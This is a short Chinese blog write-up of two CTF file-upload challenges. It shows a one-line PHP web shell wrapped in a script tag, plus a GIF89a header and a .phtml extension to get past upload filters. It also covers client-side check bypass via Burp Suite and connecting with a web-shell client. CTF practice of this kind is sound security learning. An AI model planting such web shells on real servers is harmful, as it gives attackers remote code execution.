【极客大挑战 2019】upload
让上传头像,试了试上传php文件,不可以。
将php文件换成jpg,里面是一句话。但是被检测出来了。加了GIF89a同样被检测。
试试用js包裹。但是这里文件的格式就不能是jpg了,试了html不行,但是可以用phtml
<script language="php">eval($POST[123])</script>
然后返回说它不是图片。这时我们再加入GIF89a试试。
结果上传成功。
我们再用菜刀链接。
根据url可以判断上传文件应该再upload目录下。
【ACTF2020 新生赛】Upload
直接上传phtml是上传不了的,同时也不通过burp suite,应该是浏览器端验证,先上传gif,然后利用burp suite抓包,更改后缀为phtml,然后上传成功,同时也链接成功。在这里使用图片格式的后缀直接上传的话,也是可以上传的,但是无法用菜刀链接,网上查了下,说如果需要链接的话需要有文件包含漏洞,才可以链接成功。
博客内容遵循 4.0 国际 (CC BY-NC-SA 4.0) 协议
